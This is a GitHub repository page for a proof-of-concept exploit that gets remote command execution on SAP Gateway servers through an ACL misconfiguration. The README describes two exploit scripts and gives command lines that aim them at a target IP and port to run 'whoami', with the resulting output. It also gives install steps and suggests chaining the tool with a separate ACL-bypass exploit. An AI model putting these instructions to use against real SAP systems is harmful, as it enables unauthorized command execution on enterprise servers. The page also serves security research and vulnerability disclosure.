Skip to content

chipik/SAP_GW_RCE_exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
COPYING
COPYING
 
 
README.md
README.md
 
 
SAPanonGWv1.py
SAPanonGWv1.py
 
 
SAPanonGWv2.py
SAPanonGWv2.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

What is it?

This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).

SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!).

SAPanonGWv2.py is the second version of the exploit based on the pysap library.

Creds

These PoCs were developed by Dmitry @_chipik Chastuhin

How to use

➜python SAPanonGWv1.py -t 172.16.30.28 -p 3300 -c whoami
[*] sending cmd:whoami
n45adm
➜python SAPanonGWv2.py -t <ip> -p 3300 -c whoami
[INFO ] [+] Sending GW_NORMAL_CLIENT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2
n45adm

Installation

Only for SAPanonGWv2.p

git clone https://github.com/gelim/pysap
pip install -r pysap/requirements.txt
python pysap/setup.py install
git clone https://github.com/chipik/SAP_GW_RCE_exploit

or

git clone https://github.com/chipik/SAP_GW_RCE_exploit
pip install -r SAP_GW_RCE_exploit/requirements.txt

SAP GW ACL bypass

You can use these exploits together with SAP MS Trusted exploit that allows you to bypass dafault sec_info ACL

See our presentation for details

Contributors

Contributions made by:

About

SAP Gateway RCE exploits

Resources

Readme

License

GPL-2.0 license
Activity

Stars

150 stars

Watchers

7 watching

Forks

52 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages